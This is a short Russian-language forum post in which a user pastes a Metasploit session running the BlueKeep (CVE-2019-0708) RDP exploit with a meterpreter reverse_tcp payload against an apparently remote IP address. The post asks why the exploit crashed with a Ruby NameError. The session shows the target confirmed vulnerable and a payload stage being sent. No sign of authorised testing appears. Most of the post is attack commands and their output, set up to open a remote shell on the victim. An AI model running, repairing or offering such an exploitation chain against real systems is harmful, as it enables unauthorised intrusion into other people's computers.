
21.03.2020, 00:18
|
|
Новичок
Регистрация: 20.03.2020
Сообщений: 4
С нами:
3238166
Репутация:
0
|
|
Проблемма с использованиемCVE-2019-0708
msf5 > use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set target 1
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > set rhosts 200.000.100.28
msf5 exploit(windows/rdp/cve_2019_0708_bluekeep_rce) > exploit
[*] Exploiting target 200.000.100.28
[*] Started reverse TCP handler on 192.168.1.114:4444
[*] 200.000.100.28:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check
[+] 200.000.100.28:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.
[*] 200.000.100.28:3389 - Scanned 1 of 1 hosts (100% complete)
[*] Sending stage (206403 bytes) to 5.164.26.35 [COLOR="#ff0000"][SIZE="4"]
[*] 200.000.100.28:3389 - Surfing channels ...
[*] 200.000.100.28:3389 - Lobbing eggs ...
[-] 200.000.100.28:3389 - Exploit failed: NameError undefined local variable or method `rdp_move_mouse' for #
Может кто сталкивался, все перекопал не нашел похожей траблы.
|
|
|